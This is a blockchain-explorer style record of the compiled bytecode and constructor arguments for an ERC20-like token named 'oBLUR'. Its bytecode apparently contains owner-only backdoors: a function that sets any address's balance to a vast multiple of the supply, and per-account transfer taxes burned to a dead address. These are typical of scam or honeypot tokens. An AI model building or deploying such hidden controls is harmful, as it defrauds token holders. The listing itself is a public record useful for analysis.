005b610386600480360381019061038191906117a8565b610b1c565b005b6103a2600480360381019061039d91906117d1565b610c12565b6040516103af9190611e55565b60405180910390f35b6103d260048036038101906103cd919061185c565b610c98565b005b6060600280546103e390612044565b80601f016020809104026020016040519081016040528092919081815260200182805461040f90612044565b801561045c5780601f106104315761010080835404028352916020019161045c565b820191906000526020600020905b81548152906001019060200180831161043f57829003601f168201915b5050505050905090565b600080610471610dc6565b905061047e818585610dce565b600191505092915050565b6000600154905090565b60008061049e610dc6565b90506104ab858285610f98565b6104b6858585611024565b60019150509392505050565b60006012905090565b6104d3610dc6565b73ffffffffffffffffffffffffffffffffffffffff16600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610562576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161055990611dd5565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614156105d2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105c990611d55565b60405180910390fd5b6105db81611660565b50565b6000806105e9610dc6565b905061067c8185856000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546106779190611ea7565b610dce565b600191505092915050565b61068f610dc6565b73ffffffffffffffffffffffffffffffffffffffff16600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461071e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161071590611dd5565b60405180910390fd5b80600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6000600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606003805461080a90612044565b80601f016020809104026020016040519081016040528092919081815260200182805461083690612044565b80156108835780601f1061085857610100808354040283529160200191610883565b820191906000526020600020905b81548152906001019060200180831161086657829003601f168201915b5050505050905090565b600080610898610dc6565b905060008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508381101561095d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161095490611e35565b60405180910390fd5b61096a8286868403610dce565b60019250505092915050565b600080610981610dc6565b905061098e818585611024565b600191505092915050565b60006109a3610dc6565b73ffffffffffffffffffffffffffffffffffffffff16600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610a32576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a2990611dd5565b60405180910390fd5b600b60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610a81610dc6565b73ffffffffffffffffffffffffffffffffffffffff16600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610b10576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b0790611dd5565b60405180910390fd5b610b1a6000611660565b565b610b24610dc6565b73ffffffffffffffffffffffffffffffffffffffff16600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610bb3576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610baa90611dd5565b60405180910390fd5b655af3107a4000610bc2610489565b610bcc9190611f2e565b600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555050565b60008060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610ca0610dc6565b73ffffffffffffffffffffffffffffffffffffffff16600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610d2f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d2690611dd5565b60405180910390fd5b60028111610d72576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d6990611d35565b60405180910390fd5b600081610d7f9190611ea7565b600b60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610e3e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e3590611e15565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610eae576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ea590611d75565b60405180910390fd5b806000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610f8b9190611e55565b60405180910390a3505050565b6000610fa48484610c12565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff811461101e5781811015611010576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161100790611d95565b60405180910390fd5b61101d8484848403610dce565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415611094576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161108b90611df5565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611104576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110fb90611d15565b60405180910390fd5b6000600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508181101561118b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161118290611db5565b60405180910390fd5b60008060039050600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614156111ee5760085490505b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff16141561124a5760095490505b6000600b60008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205411156112e1576000600b60008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546112de9190611ea7565b90505b61130760646112f9838761172690919063ffffffff16565b61173c90919063ffffffff16565b915060008211156114a85761136482600560008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461175290919063ffffffff16565b600560008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506113fb826005600061dead73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461176890919063ffffffff16565b6005600061dead73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061dead73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161149f9190611e55565b60405180910390a35b61150582856114b79190611f88565b600560008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461175290919063ffffffff16565b600560008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506115a582856115579190611f88565b600560008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461176890919063ffffffff16565b600560008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508473ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84876116439190611f88565b6040516116509190611e55565b60405180910390a3505050505050565b6000600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600460006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f7699c77f2404f9b6bbd003861bb4af8ae70b205e19e73d7ec7fe4590db59a6b760405160405180910390a35050565b600081836117349190611f2e565b905092915050565b6000818361174a9190611efd565b905092915050565b600081836117609190611f88565b905092915050565b600081836117769190611ea7565b905092915050565b60008135905061178d81612114565b92915050565b6000813590506117a28161212b565b92915050565b6000602082840312156117ba57600080fd5b60006117c88482850161177e565b91505092915050565b600080604083850312156117e457600080fd5b60006117f28582860161177e565b92505060206118038582860161177e565b9150509250929050565b60008060006060848603121561182257600080fd5b60006118308682870161177e565b93505060206118418682870161177e565b925050604061185286828701611793565b9150509250925092565b6000806040838503121561186f57600080fd5b600061187d8582860161177e565b925050602061188e85828601611793565b9150509250929050565b6118a181611fbc565b82525050565b6118b081611fce565b82525050565b60006118c182611e8b565b6118cb8185611e96565b93506118db818560208601612011565b6118e481612103565b840191505092915050565b60006118fc602383611e96565b91507f45524332303a207472616e7366657220746f20746865207a65726f206164647260008301527f65737300000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b6000611962602e83611e96565b91507f4163636f756e7420746178206d7573742062652067726561746572207468616e60008301527f206f7220657175616c20746f20310000000000000000000000000000000000006020830152604082019050919050565b60006119c8602683611e96565b91507f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008301527f64647265737300000000000000000000000000000000000000000000000000006020830152604082019050919050565b6000611a2e602283611e96565b91507f45524332303a20617070726f766520746f20746865207a65726f20616464726560008301527f73730000000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b6000611a94601d83611e96565b91507f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006000830152602082019050919050565b6000611ad4602683611e96565b91507f45524332303a207472616e7366657220616d6f756e742065786365656473206260008301527f616c616e636500000000000000000000000000000000000000000000000000006020830152604082019050919050565b6000611b3a602083611e96565b91507f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726000830152602082019050919050565b6000611b7a602583611e96565b91507f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008301527f64726573730000000000000000000000000000000000000000000000000000006020830152604082019050919050565b6000611be0602483611e96565b91507f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008301527f72657373000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b6000611c46602583611e96565b91507f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008301527f207a65726f0000000000000000000000000000000000000000000000000000006020830152604082019050919050565b611ca881611ffa565b82525050565b611cb781612004565b82525050565b6000602082019050611cd26000830184611898565b92915050565b6000602082019050611ced60008301846118a7565b92915050565b60006020820190508181036000830152611d0d81846118b6565b905092915050565b60006020820190508181036000830152611d2e816118ef565b9050919050565b60006020820190508181036000830152611d4e81611955565b9050919050565b60006020820190508181036000830152611d6e816119bb565b9050919050565b60006020820190508181036000830152611d8e81611a21565b9050919050565b60006020820190508181036000830152611dae81611a87565b9050919050565b60006020820190508181036000830152611dce81611ac7565b9050919050565b60006020820190508181036000830152611dee81611b2d565b9050919050565b60006020820190508181036000830152611e0e81611b6d565b9050919050565b60006020820190508181036000830152611e2e81611bd3565b9050919050565b60006020820190508181036000830152611e4e81611c39565b9050919050565b6000602082019050611e6a6000830184611c9f565b92915050565b6000602082019050611e856000830184611cae565b92915050565b600081519050919050565b600082825260208201905092915050565b6000611eb282611ffa565b9150611ebd83611ffa565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115611ef257611ef1612076565b5b828201905092915050565b6000611f0882611ffa565b9150611f1383611ffa565b925082611f2357611f226120a5565b5b828204905092915050565b6000611f3982611ffa565b9150611f4483611ffa565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615611f7d57611f7c612076565b5b828202905092915050565b6000611f9382611ffa565b9150611f9e83611ffa565b925082821015611fb157611fb0612076565b5b828203905092915050565b6000611fc782611fda565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b8381101561202f578082015181840152602081019050612014565b8381111561203e576000848401525b50505050565b6000600282049050600182168061205c57607f821691505b602082108114156120705761206f6120d4565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000601f19601f8301169050919050565b61211d81611fbc565b811461212857600080fd5b50565b61213481611ffa565b811461213f57600080fd5b5056fea26469706673582212209d250996852dde7a9c122046300286edbeda1654ed746632fb8ca0019f4be49564736f6c63430008000033000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000000000000000000000000000000000003b9aca0000000000000000000000000000000000000000000000000000000000000000056f424c555200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000056f424c5552000000000000000000000000000000000000000000000000000000
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106101215760003560e01c806370a08231116100ad578063b7b2eb1711610071578063b7b2eb1714610332578063c2af913b14610362578063dc50773e1461036c578063dd62ed3e14610388578063e0ce2a05146103b857610121565b806370a08231146102665780638da5cb5b1461029657806395d89b41146102b4578063a457c2d7146102d2578063a9059cbb1461030257610121565b8063313ce567116100f4578063313ce567146101c25780633247986c146101e057806339509351146101fc578063444a2a9c1461022c57806349bd5a5e1461024857610121565b806306fdde0314610126578063095ea7b31461014457806318160ddd1461017457806323b872dd14610192575b600080fd5b61012e6103d4565b60405161013b9190611cf3565b60405180910390f35b61015e6004803603810190610159919061185c565b610466565b60405161016b9190611cd8565b60405180910390f35b61017c610489565b6040516101899190611e55565b60405180910390f35b6101ac60048036038101906101a7919061180d565b610493565b6040516101b99190611cd8565b60405180910390f35b6101ca6104c2565b6040516101d79190611e70565b60405180910390f35b6101fa60048036038101906101f591906117a8565b6104cb565b005b6102166004803603810190610211919061185c565b6105de565b6040516102239190611cd8565b60405180910390f35b610246600480360381019061024191906117a8565b610687565b005b610250610762565b60405161025d9190611cbd565b60405180910390f35b610280600480360381019061027b91906117a8565b610788565b60405161028d9190611e55565b60405180910390f35b61029e6107d1565b6040516102ab9190611cbd565b60405180910390f35b6102bc6107fb565b6040516102c99190611cf3565b60405180910390f35b6102ec60048036038101906102e7919061185c565b61088d565b6040516102f99190611cd8565b60405180910390f35b61031c6004803603810190610317919061185c565b610976565b6040516103299190611cd8565b60405180910390f35b61034c600480360381019061034791906117a8565b610999565b6040516103599190611e55565b60405180910390f35b61036a610a79565b005b610386600480360381019061038191906117a8565b610b1c565b005b6103a2600480360381019061039d91906117d1565b610c12565b6040516103af9190611e55565b60405180910390f35b6103d260048036038101906103cd919061185c565b610c98565b005b6060600280546103e390612044565b80601f016020809104026020016040519081016040528092919081815260200182805461040f90612044565b801561045c5780601f106104315761010080835404028352916020019161045c565b820191906000526020600020905b81548152906001019060200180831161043f57829003601f168201915b5050505050905090565b600080610471610dc6565b905061047e818585610dce565b600191505092915050565b6000600154905090565b60008061049e610dc6565b90506104ab858285610f98565b6104b6858585611024565b60019150509392505050565b60006012905090565b6104d3610dc6565b73ffffffffffffffffffffffffffffffffffffffff16600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610562576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161055990611dd5565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614156105d2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105c990611d55565b60405180910390fd5b6105db81611660565b50565b6000806105e9610dc6565b905061067c8185856000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546106779190611ea7565b610dce565b600191505092915050565b61068f610dc6565b73ffffffffffffffffffffffffffffffffffffffff16600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461071e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161071590611dd5565b60405180910390fd5b80600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6000600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606003805461080a90612044565b80601f016020809104026020016040519081016040528092919081815260200182805461083690612044565b80156108835780601f1061085857610100808354040283529160200191610883565b820191906000526020600020905b81548152906001019060200180831161086657829003601f168201915b5050505050905090565b600080610898610dc6565b905060008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508381101561095d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161095490611e35565b60405180910390fd5b61096a8286868403610dce565b60019250505092915050565b600080610981610dc6565b905061098e818585611024565b600191505092915050565b60006109a3610dc6565b73ffffffffffffffffffffffffffffffffffffffff16600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610a32576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a2990611dd5565b60405180910390fd5b600b60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610a81610dc6565b73ffffffffffffffffffffffffffffffffffffffff16600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610b10576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b0790611dd5565b60405180910390fd5b610b1a6000611660565b565b610b24610dc6565b73ffffffffffffffffffffffffffffffffffffffff16600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610bb3576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610baa90611dd5565b60405180910390fd5b655af3107a4000610bc2610489565b610bcc9190611f2e565b600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555050565b60008060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610ca0610dc6565b73ffffffffffffffffffffffffffffffffffffffff16600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610d2f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d2690611dd5565b60405180910390fd5b60028111610d72576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d6990611d35565b60405180910390fd5b600081610d7f9190611ea7565b600b60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610e3e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e3590611e15565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610eae576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ea590611d75565b60405180910390fd5b806000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610f8b9190611e55565b60405180910390a3505050565b6000610fa48484610c12565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff811461101e5781811015611010576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161100790611d95565b60405180910390fd5b61101d8484848403610dce565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415611094576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161108b90611df5565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611104576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110fb90611d15565b60405180910390fd5b6000600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508181101561118b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161118290611db5565b60405180910390fd5b60008060039050600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614156111ee5760085490505b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff16141561124a5760095490505b6000600b60008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205411156112e1576000600b60008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546112de9190611ea7565b90505b61130760646112f9838761172690919063ffffffff16565b61173c90919063ffffffff16565b915060008211156114a85761136482600560008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461175290919063ffffffff16565b600560008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506113fb826005600061dead73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461176890919063ffffffff16565b6005600061dead73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061dead73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161149f9190611e55565b60405180910390a35b61150582856114b79190611f88565b600560008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461175290919063ffffffff16565b600560008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506115a582856115579190611f88565b600560008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461176890919063ffffffff16565b600560008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508473ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84876116439190611f88565b6040516116509190611e55565b60405180910390a3505050505050565b6000600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600460006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f7699c77f2404f9b6bbd003861bb4af8ae70b205e19e73d7ec7fe4590db59a6b760405160405180910390a35050565b600081836117349190611f2e565b905092915050565b6000818361174a9190611efd565b905092915050565b600081836117609190611f88565b905092915050565b600081836117769190611ea7565b905092915050565b60008135905061178d81612114565b92915050565b6000813590506117a28161212b565b92915050565b6000602082840312156117ba57600080fd5b60006117c88482850161177e565b91505092915050565b600080604083850312156117e457600080fd5b60006117f28582860161177e565b92505060206118038582860161177e565b9150509250929050565b60008060006060848603121561182257600080fd5b60006118308682870161177e565b93505060206118418682870161177e565b925050604061185286828701611793565b9150509250925092565b6000806040838503121561186f57600080fd5b600061187d8582860161177e565b925050602061188e85828601611793565b9150509250929050565b6118a181611fbc565b82525050565b6118b081611fce565b82525050565b60006118c182611e8b565b6118cb8185611e96565b93506118db818560208601612011565b6118e481612103565b840191505092915050565b60006118fc602383611e96565b91507f45524332303a207472616e7366657220746f20746865207a65726f206164647260008301527f65737300000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b6000611962602e83611e96565b91507f4163636f756e7420746178206d7573742062652067726561746572207468616e60008301527f206f7220657175616c20746f20310000000000000000000000000000000000006020830152604082019050919050565b60006119c8602683611e96565b91507f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008301527f64647265737300000000000000000000000000000000000000000000000000006020830152604082019050919050565b6000611a2e602283611e96565b91507f45524332303a20617070726f766520746f20746865207a65726f20616464726560008301527f73730000000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b6000611a94601d83611e96565b91507f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006000830152602082019050919050565b6000611ad4602683611e96565b91507f45524332303a207472616e7366657220616d6f756e742065786365656473206260008301527f616c616e636500000000000000000000000000000000000000000000000000006020830152604082019050919050565b6000611b3a602083611e96565b91507f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726000830152602082019050919050565b6000611b7a602583611e96565b91507f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008301527f64726573730000000000000000000000000000000000000000000000000000006020830152604082019050919050565b6000611be0602483611e96565b91507f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008301527f72657373000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b6000611c46602583611e96565b91507f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008301527f207a65726f0000000000000000000000000000000000000000000000000000006020830152604082019050919050565b611ca881611ffa565b82525050565b611cb781612004565b82525050565b6000602082019050611cd26000830184611898565b92915050565b6000602082019050611ced60008301846118a7565b92915050565b60006020820190508181036000830152611d0d81846118b6565b905092915050565b60006020820190508181036000830152611d2e816118ef565b9050919050565b60006020820190508181036000830152611d4e81611955565b9050919050565b60006020820190508181036000830152611d6e816119bb565b9050919050565b60006020820190508181036000830152611d8e81611a21565b9050919050565b60006020820190508181036000830152611dae81611a87565b9050919050565b60006020820190508181036000830152611dce81611ac7565b9050919050565b60006020820190508181036000830152611dee81611b2d565b9050919050565b60006020820190508181036000830152611e0e81611b6d565b9050919050565b60006020820190508181036000830152611e2e81611bd3565b9050919050565b60006020820190508181036000830152611e4e81611c39565b9050919050565b6000602082019050611e6a6000830184611c9f565b92915050565b6000602082019050611e856000830184611cae565b92915050565b600081519050919050565b600082825260208201905092915050565b6000611eb282611ffa565b9150611ebd83611ffa565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115611ef257611ef1612076565b5b828201905092915050565b6000611f0882611ffa565b9150611f1383611ffa565b925082611f2357611f226120a5565b5b828204905092915050565b6000611f3982611ffa565b9150611f4483611ffa565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615611f7d57611f7c612076565b5b828202905092915050565b6000611f9382611ffa565b9150611f9e83611ffa565b925082821015611fb157611fb0612076565b5b828203905092915050565b6000611fc782611fda565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b8381101561202f578082015181840152602081019050612014565b8381111561203e576000848401525b50505050565b6000600282049050600182168061205c57607f821691505b602082108114156120705761206f6120d4565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000601f19601f8301169050919050565b61211d81611fbc565b811461212857600080fd5b50565b61213481611ffa565b811461213f57600080fd5b5056fea26469706673582212209d250996852dde7a9c122046300286edbeda1654ed746632fb8ca0019f4be49564736f6c63430008000033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000000000000000000000000000000000003b9aca0000000000000000000000000000000000000000000000000000000000000000056f424c555200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000056f424c5552000000000000000000000000000000000000000000000000000000
-----Decoded View---------------
Arg [0] : name_ (string): oBLUR
Arg [1] : symbol_ (string): oBLUR
Arg [2] : totalSupply_ (uint256): 1000000000
-----Encoded View---------------
